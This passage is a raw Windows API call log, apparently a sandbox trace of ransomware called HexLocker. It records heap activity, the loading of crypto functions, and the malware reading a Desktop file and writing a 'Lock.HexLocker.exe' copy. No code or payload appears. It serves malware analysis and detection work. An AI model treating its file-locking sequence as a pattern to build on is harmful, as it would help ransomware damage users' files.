wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0182.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0182.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0182.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0182.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b88 [0182.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0182.142] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0182.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0182.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.143] CryptDestroyHash (hHash=0xa87690) returned 1 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0182.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0182.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0182.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0182.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0182.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0182.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0182.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0182.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0182.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0182.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0182.220] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.220] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0182.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.220] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0182.220] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexlocker.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0182.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.341] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0182.341] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.344] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.346] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.348] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.350] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.354] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.355] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.357] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.359] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.361] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.363] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.365] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0182.367] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x4066, lpOverlapped=0x0) returned 1 [0182.368] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0182.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0182.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0182.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0182.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0182.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf6d020 [0182.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: 